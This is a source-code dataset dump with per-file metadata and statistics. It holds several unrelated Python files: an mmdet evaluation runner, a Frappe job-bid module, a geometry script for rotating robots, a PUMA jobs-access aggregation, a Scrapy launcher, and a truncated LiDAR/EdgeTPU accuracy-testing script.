| 27.292683 | 78 | 0.65773 | 134 | 1,119 | 5.373134 | 0.380597 | 0.111111 | 0.0875 | 0.05 | 0.088889 | 0.088889 | 0 | 0 | 0 | 0 | 0 | 0.002451 | 0.270777 | 1,119 | 40 | 79 | 27.975 | 0.879902 | 0.476318 | 0 | 0.125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0.0625 | 0 | 0.375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
39224edae2c8c9217adba82e613f3d788595f00d | 2,482 | py | Python | tools/eval2txt.py | youshyee/Greatape-Detection | 333b63d8f76538659bcd2bc6022128830a7a435b | [
"Apache-2.0"
] | 1 | 2019-09-22T16:47:16.000Z | 2019-09-22T16:47:16.000Z | tools/eval2txt.py | youshyee/Greatape-Detection | 333b63d8f76538659bcd2bc6022128830a7a435b | [
"Apache-2.0"
] | null | null | null | tools/eval2txt.py | youshyee/Greatape-Detection | 333b63d8f76538659bcd2bc6022128830a7a435b | [
"Apache-2.0"
] | null | null | null | '''
given a wordking dir
calculate the result for each epoch saving and save it as txt file
'''
import os
import mmcv
import argparse
import os.path as osp
import shutil
import tempfile
import torch
import torch.distributed as dist
from mmcv.runner import load_checkpoint, get_dist_info
from mmcv.parallel import MMDataParallel, MMDistributedDataParallel
from mmdet.apis import init_dist
from mmdet.core import results2json, coco_eval
from mmdet.datasets import build_dataloader, get_dataset
from mmdet.models import build_detector
import subprocess
files=os.listdir('/mnt/storage/home/rn18510/')
folders=[f for f in files if 'slurm_mm' in f]
all_shfiles=[]
for folder in folders:
root=os.path.join('/mnt/storage/home/rn18510/',folder)
shfiles = os.listdir(root)
shfiles = [os.path.join(root,i) for i in shfiles if '.sh' in i]
all_shfiles+=shfiles
for shfile in all_shfiles:
list_sh=mmcv.list_from_file(shfile)
for line in list_sh:
if 'WORK_DIR=' in line:
workdir=line
if 'CONFIG=' in line:
config=line
workdir=workdir.replace('WORK_DIR=','')
config=config.replace('CONFIG=','')
if os.path.exists(workdir):
pass
else:
print('not exe')
continue
print(workdir)
print(config)
all_result_file=[i for i in os.listdir(workdir) if '.result' in i]
all_pth_file=[i for i in os.listdir(workdir) if '.pth' in i and 'latest' not in i]
to_exe_pth=[]
if len(all_result_file)>11 and len(all_pth_file)>11:
#find the epoch
best=sorted(all_result_file,key = lambda x:int(x.split('.')[0].split('_')[-1]))[-1]
latest=sorted(all_pth_file,key = lambda x : int(x.split('.')[0].split('_')[-1]))[-1]
ep=int(best.split('.')[0].split('_')[0].replace('ep',''))
ep='epoch_{}.pth'.format(ep)
if ep ==latest:
pass
else:
to_exe_pth.append(ep)
to_exe_pth.append(latest)
else:
to_exe_pth+=all_pth_file
all_txt_file=[i for i in os.listdir(workdir) if '.txt' in i]
txt_eps=[i.split('.')[0].split('_')[-1].replace('ep','') for i in all_txt_file]
to_exe_eps=[i.split('.')[0].split('_')[-1] for i in to_exe_pth]
to_exe_eps=list(set(to_exe_eps)-set(txt_eps))
to_exe_pth = ['epoch_{}.pth'.format(ep) for ep in to_exe_eps]
#filter already has .txt file epoch
for exe_pth in to_exe_pth:
print('runing',config,workdir,exe_pth)
subprocess.run(['sh','tools/dist_test.sh','{}'.format(config),'{}'.format(os.path.join(workdir,exe_pth)),'2','--work_dir','{}'.format(workdir)])
#exe
| 31.820513 | 148 | 0.695407 | 416 | 2,482 | 3.975962 | 0.269231 | 0.033253 | 0.033857 | 0.016929 | 0.109432 | 0.109432 | 0.090085 | 0.090085 | 0.090085 | 0.037485 | 0 | 0.013264 | 0.149476 | 2,482 | 77 | 149 | 32.233766 | 0.770251 | 0.056406 | 0 | 0.080645 | 0 | 0 | 0.087479 | 0.022298 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.032258 | 0.241935 | 0 | 0.241935 | 0.064516 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
3923d604ff92a346c270b87926a44f2862185eb0 | 3,118 | py | Python | community_erpnext_com/erpnext_community_portal/doctype/frappe_job_bid/frappe_job_bid.py | saurabh6790/community_erpnext_com | edf285de15285e376b223b8c85ea19b46e7d16d7 | [
"MIT"
] | null | null | null | community_erpnext_com/erpnext_community_portal/doctype/frappe_job_bid/frappe_job_bid.py | saurabh6790/community_erpnext_com | edf285de15285e376b223b8c85ea19b46e7d16d7 | [
"MIT"
] | null | null | null | community_erpnext_com/erpnext_community_portal/doctype/frappe_job_bid/frappe_job_bid.py | saurabh6790/community_erpnext_com | edf285de15285e376b223b8c85ea19b46e7d16d7 | [
"MIT"
] | 1 | 2020-02-27T11:18:08.000Z | 2020-02-27T11:18:08.000Z | # Copyright (c) 2015, Frappe Technologies Pvt Ltd and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from frappe import _
from frappe.website.website_generator import WebsiteGenerator
from frappe.website.utils import get_comment_list
class FrappeJobBid(WebsiteGenerator):
website = frappe._dict(
template = "templates/generators/bid.html",
page_title = "Bid",
no_cache = 1,
)
def onload(self):
self.frappe_job_title = frappe.db.get_value("Frappe Job", self.frappe_job, "job_title")
self.frappe_job_title = frappe.db.get_value("Frappe Job", self.frappe_job, "job_title")
def before_insert(self):
if frappe.db.get_value("Frappe Job Bid",
{"frappe_partner": self.frappe_partner, "frappe_job": self.frappe_job}):
frappe.msgprint("You have already bid for this job")
raise frappe.ValidationError
if frappe.db.get_value("Frappe Job", self.frappe_job, "owner")==frappe.session.user:
frappe.msgprint("You can't bid for your own job!")
raise frappe.ValidationError
self.frappe_job_title = frappe.db.get_value("Frappe Job", self.frappe_job,
"job_title")
self.frappe_partner_title = frappe.db.get_value("Frappe Partner", self.frappe_partner,
"partner_name")
def after_insert(self):
frappe.sendmail(
recipients=[frappe.db.get_value("Frappe Job", self.frappe_job, "owner")],
subject="New Bid for your Job {0}".format(self.frappe_job_title),
message=new_bid_template.format(**self.as_dict()))
def get_context(self, context):
context.job = frappe.get_doc("Frappe Job", self.frappe_job)
context.partner = frappe.get_doc("Frappe Partner", self.frappe_partner)
context.comment_list = get_comment_list(self.doctype, self.name)
def get_parents(self, context):
return [{"title":"Community", "name": "community"},
{"title":"Jobs", "name": "community/jobs"},
{"title": context.job.job_title, "name": context.job.route }]
def on_trash(self):
if self.status == "Accepted":
frappe.throw(_("Accepted bid cannot be deleted"))
@frappe.whitelist()
def accept(bid):
bid = frappe.get_doc("Frappe Job Bid", bid)
job = frappe.get_doc("Frappe Job", bid.frappe_job)
if job.owner != frappe.session.user:
frappe.throw(_("Not Allowed"), frappe.PermissionError)
if job.status != "Open":
frappe.throw(_("Bid not Open"))
bid.status = "Accepted"
bid.save(ignore_permissions=True)
bid.clear_cache()
job.status = "Assigned"
job.frappe_partner = bid.frappe_partner
job.save(ignore_permissions=True)
job.clear_cache()
@frappe.whitelist()
def delete(bid):
bid = frappe.get_doc("Frappe Job Bid", bid)
if bid.owner != frappe.session.user:
frappe.throw(_("Not Allowed"), frappe.PermissionError)
frappe.delete_doc("Frappe Job Bid", bid.name, ignore_permissions=True)
job = frappe.get_doc("Frappe Job", bid.frappe_job)
job.clear_cache()
new_bid_template = """
<h3>Notification from Frappe.io Community Portal</h3>
<p>{frappe_partner_title} has bid for your job {frappe_job_title}</p>
<p><a href="https://community.erpnext.com/jobs/{frappe_job}">
Click here to manage bids</a></p>
"""
| 34.263736 | 89 | 0.739256 | 453 | 3,118 | 4.900662 | 0.262693 | 0.113514 | 0.064414 | 0.05045 | 0.359009 | 0.297297 | 0.262613 | 0.24955 | 0.24955 | 0.187387 | 0 | 0.002915 | 0.119949 | 3,118 | 90 | 90 | 34.644444 | 0.806122 | 0.03592 | 0 | 0.197183 | 0 | 0 | 0.244422 | 0.025308 | 0 | 0 | 0 | 0 | 0 | 1 | 0.112676 | false | 0 | 0.070423 | 0.014085 | 0.225352 | 0.028169 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
39243003cba396e92b11cfacdc18745deb8b6050 | 2,314 | py | Python | Passing/rotate.py | FootBrawlers/Passing_Algo | 5341168dc12f7c4cb254a0a4901de7c3766cc823 | [
"MIT"
] | 1 | 2020-01-16T13:19:19.000Z | 2020-01-16T13:19:19.000Z | Passing/rotate.py | FootBrawlers/Passing_Algo | 5341168dc12f7c4cb254a0a4901de7c3766cc823 | [
"MIT"
] | null | null | null | Passing/rotate.py | FootBrawlers/Passing_Algo | 5341168dc12f7c4cb254a0a4901de7c3766cc823 | [
"MIT"
] | 1 | 2020-01-09T21:04:30.000Z | 2020-01-09T21:04:30.000Z | import math
if(__name__=="__main__"):
pos1=[-5,-2] #positions of the bots
pos2=[-9,2]
ang1=123 #initial direction of bots
ang2=21
def cosinv(num): #function to return cos inverse in degrees
ang=math.acos(num)
ang=180*ang/(math.pi)
return(ang)
def rotate(pos1,ang1,pos2,ang2): #actual function
dist=math.sqrt((pos1[0]-pos2[0])**2+(pos1[1]-pos2[1])**2) #distance between bots
x=abs(pos1[0]-pos2[0]) # adjacent side of triangle
c_ang=cosinv(x/dist) # cosx= adjacent/dist
# checking quadrant of bot 2 wrt bot1
if pos2[0]>pos1[0] and pos2[1]>=pos1[1]: #quad1
f_ang1=c_ang
elif pos2[0]<=pos1[0] and pos2[1]>pos1[1]: #quad2
f_ang1=180-c_ang
elif pos2[0]<pos1[0] and pos2[1]<=pos1[1]: #quad3
f_ang1=180+c_ang
elif pos2[0]>=pos1[0] and pos2[1]<pos1[1]: #quad4
f_ang1=360-c_ang
# bot 2 final position should be facing bot1....
if f_ang1<180:
f_ang2=180+f_ang1
elif f_ang1>=180:
f_ang2=f_ang1-180
print("INITIAL POSITIONS: ",pos1,ang1,pos2,ang2)
print("THEIR FINAL DIRECTIONS: ",f_ang1,f_ang2)
return f_ang1,f_ang2
#f_ang1,f_ang2=rotate(pos1,ang1,pos2,ang2)
#clockwise-> +ve , anticlockvise-> -ve
def change_in_angle(ang1,fang1,ang2,fang2): #To get the angle bot needs to rotate
c1=abs(fang1-ang1) #one possible angle
c2=abs(360-c1) #other possible angle
c=min(c1,c2) #for min rotation.
fin=ang1+c
if fin>360:
fin-=360 #to prevent angle exceeding 360
if int(fin)==int(fang1):
c_final=c*-1 #anticlockwise turn
else:
c_final=c #clockwise turn
#same process for bot 2 as well.
d1=abs(fang2-ang2)
d2=abs(360-d1)
d=min(d1,d2)
fin2=ang2+d
if fin2>360:
fin2-=360
if int(fin2)==int(fang2):
d_final=d*-1
else:
d_final=d
print("change for passer is",c_final)
print("change for receiver is",d_final)
return c_final,d_final
#change_in_angle(ang1,f_ang1,ang2,f_ang2)
| 27.879518 | 87 | 0.553587 | 350 | 2,314 | 3.537143 | 0.3 | 0.048465 | 0.03231 | 0.03231 | 0.163166 | 0.106624 | 0.106624 | 0.106624 | 0.106624 | 0.088045 | 0 | 0.110473 | 0.32325 | 2,314 | 83 | 88 | 27.879518 | 0.680077 | 0.250216 | 0 | 0.037736 | 0 | 0 | 0.057196 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.056604 | false | 0.018868 | 0.018868 | 0 | 0.113208 | 0.075472 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
3924b0c63a982cfc2185670003e734bf53265e66 | 1,346 | py | Python | aggregate/quality_of_life/access_to_jobs.py | NYCPlanning/db-equitable-development-tool | b24d83dc4092489995cabcdcb611642c1c8ee3b2 | [
"MIT"
] | 1 | 2021-12-30T21:03:56.000Z | 2021-12-30T21:03:56.000Z | aggregate/quality_of_life/access_to_jobs.py | NYCPlanning/db-equitable-development-tool | b24d83dc4092489995cabcdcb611642c1c8ee3b2 | [
"MIT"
] | 209 | 2021-10-20T19:03:04.000Z | 2022-03-31T21:02:37.000Z | aggregate/quality_of_life/access_to_jobs.py | NYCPlanning/db-equitable-development-tool | b24d83dc4092489995cabcdcb611642c1c8ee3b2 | [
"MIT"
] | null | null | null | import pandas as pd
from internal_review.set_internal_review_file import set_internal_review_files
from utils.PUMA_helpers import clean_PUMAs, puma_to_borough
def access_to_jobs(geography, write_to_internal_review=False):
indicator_col_name = "access_employment_count"
clean_df = load_clean_source_data(indicator_col_name)
final = clean_df.groupby(geography).sum()[[indicator_col_name]]
if write_to_internal_review:
set_internal_review_files(
[(final, "access_employment.csv", geography)],
"quality_of_life",
)
return final
def load_clean_source_data(indicator_col_name) -> pd.DataFrame:
source_data = pd.read_csv(
"resources/quality_of_life/access_to_jobs.csv",
usecols=[
"PUMA",
"Weighted Average Number of Jobs Accessible within 30 mins from Tract Centroid by Transit",
],
)
col_name_mapper = {
"PUMA": "puma",
"Weighted Average Number of Jobs Accessible within 30 mins from Tract Centroid by Transit": indicator_col_name,
}
source_data.rename(columns=col_name_mapper, inplace=True)
source_data["puma"] = source_data["puma"].apply(func=clean_PUMAs)
source_data["borough"] = source_data.apply(axis=1, func=puma_to_borough)
source_data["citywide"] = "citywide"
return source_data
| 37.388889 | 119 | 0.719168 | 178 | 1,346 | 5.073034 | 0.370787 | 0.110742 | 0.088594 | 0.055371 | 0.321152 | 0.252492 | 0.252492 | 0.174972 | 0.174972 | 0.174972 | 0 | 0.004608 | 0.193908 | 1,346 | 35 | 120 | 38.457143 | 0.82765 | 0 | 0 | 0 | 0 | 0 | 0.239227 | 0.065379 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0 | 0.1 | 0 | 0.233333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
3925fe1fce8c87b4355c29e43b08be99a6eefa03 | 388 | py | Python | job_scraper/__init__.py | DannyMcwaves/ATS | 91327ce15b4c4ea2fffebf02562cb8095b7983ec | [
"BSD-3-Clause"
] | null | null | null | job_scraper/__init__.py | DannyMcwaves/ATS | 91327ce15b4c4ea2fffebf02562cb8095b7983ec | [
"BSD-3-Clause"
] | 4 | 2020-06-05T17:38:46.000Z | 2022-03-02T14:54:30.000Z | job_scraper/__init__.py | DannyMcwaves/ATS | 91327ce15b4c4ea2fffebf02562cb8095b7983ec | [
"BSD-3-Clause"
] | null | null | null | """
run the scrape bot from inside the project
using an exported function from this module.
"""
__all__ = ['run']
from scrapy.crawler import CrawlerProcess
from .spiders import JobScraperSpider
def run(url):
process = CrawlerProcess({
'USER_AGENT': 'AppleWebKit/537.36 (KHTML, like Gecko)'
})
process.crawl(JobScraperSpider, start_urls=[url])
process.start()
| 20.421053 | 62 | 0.708763 | 47 | 388 | 5.723404 | 0.723404 | 0.074349 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.015773 | 0.18299 | 388 | 18 | 63 | 21.555556 | 0.832808 | 0.224227 | 0 | 0 | 0 | 0 | 0.174061 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.222222 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
392acdb2ba71ec521fa09fbe78d6aeda095a2027 | 20,473 | py | Python | python_scripts/tools/test_accuracy.py | cristianwpuig/Object-detection-and-classification-using-LiDAR-and-edgeTPU | fa876ee8ccf40ecfacfd3a697c41a519a15a3ff1 | [
"MIT"
] | null | null | null | python_scripts/tools/test_accuracy.py | cristianwpuig/Object-detection-and-classification-using-LiDAR-and-edgeTPU | fa876ee8ccf40ecfacfd3a697c41a519a15a3ff1 | [
"MIT"
] | null | null | null | python_scripts/tools/test_accuracy.py | cristianwpuig/Object-detection-and-classification-using-LiDAR-and-edgeTPU | fa876ee8ccf40ecfacfd3a697c41a519a15a3ff1 | [
"MIT"
] | null | null | null | import ctypes
import csv
import os
import numpy as np
import tflite_runtime.interpreter as tflite
import time
import platform
import collections
import operator
'''
source /home/cristian/virtualenvs/coral/bin/activate
python test_accuracy.py
'''
# Configuration parametres
print_results = True
load_results = False
write_results = True
labeled_data_dir = "/home/cristian/Desktop/LabelPointCloud/datasets/ObjDet_generated_dataset/"
total_processed_frames = len(os.listdir(labeled_data_dir + "frames/"))
start_frame_ID = 2
voxels_files_dir = "../c_algorithm_outputs/detected_objects_in_voxels/"
object_detection_outputs = "../c_algorithm_outputs/object_detection_outputs.csv"
tflite_saved_file = "./tflite_model/model_edgetpu.tflite"
config_file_dir = "./config.txt"
results_file_dir = "./tools/results.txt"
voxel_size = 16
image_size = [400, 200] # W X H
bounding_box_margin = 0.75 # Bounding box margin not counted as inside the ROI in m
start_voxels_num = 1
# To save all the generated voxels in a directory (this data is used to optimize the DNN parameters)
save_generated_voxels = True
save_generated_voxels_dir = "./tools/generated_voxels/"
def main():
performance_metrics = load_results_file(load_results, results_file_dir)
roi_axes_limits = read_axes_limit_from_config(config_file_dir)
writein_object_detection_outputs(frame_ID = start_frame_ID, is_first_frame=False)
libc = ctypes.CDLL("../Debug/libTWS_V2.1_so_Simu_ubuntu.so")
# Load network into Coral
init_time = time.time()
interpreter = make_interpreter(tflite_saved_file)
interpreter.allocate_tensors()
loadnw_time = time.time() - init_time
if print_results == True:
print("Load Network time: ", 1000*loadnw_time, " ms")
deleteVoxelFiles()
for frame_ID in range(start_frame_ID, total_processed_frames):
predicted_classes = []
# Run obj detection & tracking algotithm
out = libc.main()
obj_det_box_Xc, obj_det_csv_vel, obj_det_csv_area = loadcsv(object_detection_outputs, roi_axes_limits)
voxel_files_names = os.listdir(voxels_files_dir)
if save_generated_voxels == True:
save_generated_voxels_function(voxels_files_dir, save_generated_voxels_dir)
if os.listdir(voxels_files_dir) != []:
for voxels_file in voxel_files_names:
Voxel = read_voxel_file(voxels_files_dir + voxels_file)
predicted_classes_aux = make_inference(Voxel, interpreter)
predicted_classes.append(predicted_classes_aux)
else:
if print_results == True:
print("No objects")
deleteVoxelFiles()
# Calculate performance metrics to evaluate the model
HWLXcYcZc, classes_in_scene = read_object_point_colud(frame_ID, labeled_data_dir)
real_classes = object_classes_inside_ROI(HWLXcYcZc, classes_in_scene, roi_axes_limits)
performance_metrics["total_real_objects"] += len(real_classes)
performance_metrics["total_predicted_objects"] += len(predicted_classes)
performance_metrics["total_classified_objects"] += min(len(real_classes),len(predicted_classes))
correct_predictions = calculate_correct_predictions(HWLXcYcZc, real_classes, obj_det_box_Xc, predicted_classes)
performance_metrics["objects_classified_correctly"] += correct_predictions
performance_metrics = calculate_performance_metrics(real_classes, predicted_classes, correct_predictions, performance_metrics)
if print_results == True:
# print("HWLXcYcZc: ",HWLXcYcZc)
# print("obj_det_box_Xc: ",obj_det_box_Xc)
print("real_classes: ", real_classes)
print("predicted_classes: ", predicted_classes)
print("correct_predictions: ", performance_metrics["objects_classified_correctly"])
print("performance_metrics[total_real_objects]: ", performance_metrics["total_real_objects"])
print("performance_metrics[total_predicted_objects]: ", performance_metrics["total_predicted_objects"])
print("performance_metrics[total_classified_objects]: ", performance_metrics["total_classified_objects"])
if (performance_metrics["total_classified_objects"] != 0):
print("Accuracy: ", (performance_metrics["objects_classified_correctly"]/performance_metrics["total_classified_objects"])*100, "%")
print("performance_metrics: ", performance_metrics)
if (write_results == True):
write_results_in_file(results_file_dir, performance_metrics)
def save_generated_voxels_function(voxels_files_dir, save_generated_voxels_dir):
if not os.path.exists(save_generated_voxels_dir):
os.makedirs(save_generated_voxels_dir)
voxel_files_names = os.listdir(voxels_files_dir)
num_voxels_previously_generated = len(os.listdir(save_generated_voxels_dir))
count = 0
for voxels_file in voxel_files_names:
os.system("cp "+voxels_files_dir+voxels_file+" "+save_generated_voxels_dir+"voxel_object_"+str(start_voxels_num + num_voxels_previously_generated + count)+".txt")
count += 1
def write_results_in_file(results_file_dir, performance_metrics):
row_cnt = 0
object_detection_outputs_aux = "./tools/results_aux.txt"
with open(results_file_dir, 'r') as f_in, open(object_detection_outputs_aux, 'w') as f_out:
header = csv.reader(f_in)
writer = csv.writer(f_out)
for row in header:
row_cnt += 1
if (row_cnt == 1):
row[0] = '// Results for calculate the accuracy'
if (row_cnt == 2):
row[0] = 'TP = ' + str(int(performance_metrics["TP"]))
if (row_cnt == 3):
row[0] = 'TN = ' + str(int(performance_metrics["TN"]))
if (row_cnt == 4):
row[0] = 'FP = ' + str(int(performance_metrics["FP"]))
if (row_cnt == 5):
row[0] = 'FN = ' + str(int(performance_metrics["FN"]))
if (row_cnt == 6):
row[0] = 'total_real_objects = ' + str(int(performance_metrics["total_real_objects"]))
if (row_cnt == 7):
row[0] = 'total_predicted_objects = ' + str(int(performance_metrics["total_predicted_objects"]))
if (row_cnt == 8):
row[0] = 'total_classified_objects = ' + str(int(performance_metrics["total_classified_objects"]))
if (row_cnt == 9):
row[0] = 'objects_classified_correctly = ' + str(int(performance_metrics["objects_classified_correctly"]))
writer.writerow(row)
os.system("mv "+ object_detection_outputs_aux + " " + results_file_dir)
def load_results_file(load_results, results_file_dir):
performance_metrics = {
"TP": 0,
"TN": 0,
"FP": 0,
"FN": 0,
"Sensitivity": 0,
"Specificity": 0,
"Precision": 0,
"F1": 0,
"total_real_objects": 0,
"total_predicted_objects": 0,
"total_classified_objects": 0, # to claculate accuracy, when we have false negative or false positive results, they dont count for the accuracy calculation
"objects_classified_correctly": 0
}
if load_results == True:
with open(results_file_dir, 'r') as csvFile:
reader = csv.reader(csvFile)
for row in reader:
if (row != []):
if (row[0][0:2] == "TP"):
performance_metrics["TP"] = float(row[0].split(" ")[2])
if (row[0][0:2] == "TN"):
performance_metrics["TN"] = float(row[0].split(" ")[2])
if (row[0][0:2] == "FP"):
performance_metrics["FP"] = float(row[0].split(" ")[2])
if (row[0][0:2] == "FN"):
performance_metrics["FN"] = float(row[0].split(" ")[2])
if (row[0][0:18] == "total_real_objects"):
performance_metrics["total_real_objects"] = float(row[0].split(" ")[2])
if (row[0][0:23] == "total_predicted_objects"):
performance_metrics["total_predicted_objects"] = float(row[0].split(" ")[2])
if (row[0][0:24] == "total_classified_objects"):
performance_metrics["total_classified_objects"] = float(row[0].split(" ")[2])
if (row[0][0:28] == "objects_classified_correctly"):
performance_metrics["objects_classified_correctly"] = float(row[0].split(" ")[2])
csvFile.close()
return performance_metrics
def calculate_performance_metrics(real_classes, predicted_classes, correct_predictions, performance_metrics):
# If there are not objects in the ROI and there are no predicted objects TN is increased
if (len(real_classes) == len(predicted_classes) and len(real_classes) == 0):
performance_metrics["TN"] += 1
# If there are objects in the ROI and/or there are predicted objects, TP, FN and/or FP are increased
else:
if (len(real_classes) == len(predicted_classes)):
performance_metrics["TP"] += len(predicted_classes)
if (len(real_classes) > len(predicted_classes)):
performance_metrics["TP"] += len(predicted_classes)
performance_metrics["FN"] += len(real_classes) - len(predicted_classes)
if (len(real_classes) < len(predicted_classes)):
performance_metrics["TP"] += len(real_classes)
performance_metrics["FP"] += len(predicted_classes) - len(real_classes)
if (performance_metrics["TP"] != 0 and performance_metrics["FN"]!= 0):
performance_metrics["Sensitivity"] = 100*performance_metrics["TP"] / (performance_metrics["TP"]+performance_metrics["FN"])
performance_metrics["Specificity"] = 100*performance_metrics["TN"] / (performance_metrics["TN"]+performance_metrics["FN"])
performance_metrics["Precision"] = 100*performance_metrics["TP"] / (performance_metrics["TP"]+performance_metrics["FP"])
performance_metrics["F1"] = 2* ((performance_metrics["Precision"]*performance_metrics["Sensitivity"]) / (performance_metrics["Precision"]+performance_metrics["Sensitivity"]))
return performance_metrics
# This function calculate the correct answers by comparing the real lables withs
# the predocted ones. To assure that the real and predicted labels are form the
# same object, the objects with similar bounding box X coordinated between real
# and predicted aretaking as the same
def calculate_correct_predictions(HWLXcYcZc, real_classes, obj_det_box_Xc, predicted_classes):
correct_predictions = 0
if (len(real_classes) >= len(predicted_classes)):
ID_dist_min = np.zeros(len(predicted_classes),dtype=np.int8)
for ID_pred_obj in range(len(predicted_classes)):
distance_min = 1000
for ID_real_obj in range(len(real_classes)):
distance_between_objects = abs(HWLXcYcZc[ID_real_obj][3] - obj_det_box_Xc[ID_pred_obj])
if distance_between_objects < distance_min:
distance_min = distance_between_objects
ID_dist_min[ID_pred_obj] = ID_real_obj
if (len(predicted_classes) == 1):
if predicted_classes[0] == real_classes[ID_dist_min[0]]:
correct_predictions += 1
else:
for i in range(len(predicted_classes)):
if predicted_classes[i] == real_classes[ID_dist_min[i]]:
correct_predictions += 1
if (len(predicted_classes) > len(real_classes)):
ID_dist_min = np.zeros(len(real_classes),dtype=np.int8)
for ID_real_obj in range(len(real_classes)):
distance_min = 1000
for ID_pred_obj in range(len(predicted_classes)):
distance_between_objects = abs(HWLXcYcZc[ID_real_obj][3] - obj_det_box_Xc[ID_pred_obj])
if distance_between_objects < distance_min:
distance_min = distance_between_objects
ID_dist_min[ID_real_obj] = ID_pred_obj
if (len(real_classes) == 1):
if real_classes[0] == predicted_classes[ID_dist_min[0]]:
correct_predictions += 1
else:
for i in range(len(real_classes)):
if (ID_dist_min!=[]):
if real_classes[i] == predicted_classes[ID_dist_min[i]]:
correct_predictions += 1
return correct_predictions
def object_classes_inside_ROI(HWLXcYcZc, classes, roi_axes_limits):
classes_inside_ROI = []
for object_ID in range(len(HWLXcYcZc)):
# If the limit of the bounding box with a margin is inside the ROI there is counted as an object
if HWLXcYcZc[object_ID,3] >= (roi_axes_limits[0][0] - HWLXcYcZc[object_ID,0]/2 + bounding_box_margin) and HWLXcYcZc[object_ID,3] <= (roi_axes_limits[0][1] + HWLXcYcZc[object_ID,0]/2 - bounding_box_margin):
if HWLXcYcZc[object_ID,4] >= (roi_axes_limits[1][0] - HWLXcYcZc[object_ID,1]/2 + bounding_box_margin) and HWLXcYcZc[object_ID,4] <= (roi_axes_limits[1][1] + HWLXcYcZc[object_ID,1]/2 - bounding_box_margin):
if HWLXcYcZc[object_ID,5] >= roi_axes_limits[2][0] and HWLXcYcZc[object_ID,5] <= roi_axes_limits[2][1]:
classes_inside_ROI.append(classes[object_ID])
return classes_inside_ROI
def read_object_point_colud(frame_ID, labeled_data_dir):
csv_dir = labeled_data_dir + "labels/label_" + str(frame_ID) + ".txt"
num_points = 0
for row in open(csv_dir):
num_points += 1
HWLXcYcZc = np.zeros((num_points, 6))
classes = []
cnt_csv = 0
with open(csv_dir, 'r') as csvFile:
reader = csv.reader(csvFile, delimiter=' ')
for row in reader:
HWLXcYcZc[cnt_csv,0] = row[8]
HWLXcYcZc[cnt_csv,1] = row[9]
HWLXcYcZc[cnt_csv,2] = row[10]
HWLXcYcZc[cnt_csv,3] = row[11]
HWLXcYcZc[cnt_csv,4] = row[12]
HWLXcYcZc[cnt_csv,5] = row[13]
classes.append(row[0])
cnt_csv += 1
csvFile.close()
return HWLXcYcZc, classes
def read_lidar_frame_point_cloud(frame_ID, labeled_data_dir):
csv_dir = labeled_data_dir + "frames/frame_" + str(frame_ID) + ".csv"
num_points = 0
for row in open(csv_dir):
num_points += 1
XYZL = np.zeros((num_points, 4))
cnt_csv = 0
with open(csv_dir, 'r') as csvFile:
reader = csv.reader(csvFile)
for row in reader:
XYZL[cnt_csv,0] = row[0]
XYZL[cnt_csv,1] = row[1]
XYZL[cnt_csv,2] = row[2]
XYZL[cnt_csv,3] = row[3]
cnt_csv += 1
csvFile.close()
return XYZL
def read_axes_limit_from_config(config_file_dir):
roi_axes_limits = [[0, 0 ],[0, 0],[0, 0]]
with open(config_file_dir, 'r') as csvFile:
reader = csv.reader(csvFile)
for row in reader:
if (row != []):
if (row[0][0:4] == "XMIN"):
roi_axes_limits[0][0] = float(row[0].split(" ")[2])
if (row[0][0:4] == "XMAX"):
roi_axes_limits[0][1] = float(row[0].split(" ")[2])
if (row[0][0:4] == "YMIN"):
roi_axes_limits[1][0] = float(row[0].split(" ")[2])
if (row[0][0:4] == "YMAX"):
roi_axes_limits[1][1] = float(row[0].split(" ")[2])
if (row[0][0:4] == "ZMIN"):
roi_axes_limits[2][0] = float(row[0].split(" ")[2])
if (row[0][0:4] == "ZMAX"):
roi_axes_limits[2][1] = float(row[0].split(" ")[2])
csvFile.close()
return roi_axes_limits
def make_inference(Voxel, interpreter):
top_k = 1
threshold = 0.0
init_time = time.time()
set_input(interpreter, Voxel)
interpreter.invoke()
output = get_output(interpreter, top_k, threshold)
inf_time = time.time() - init_time
predicted_class = output[0][0]
predicted_score = output[0][1]
if print_results == True:
print("Inference time: ", 1000*inf_time, " ms")
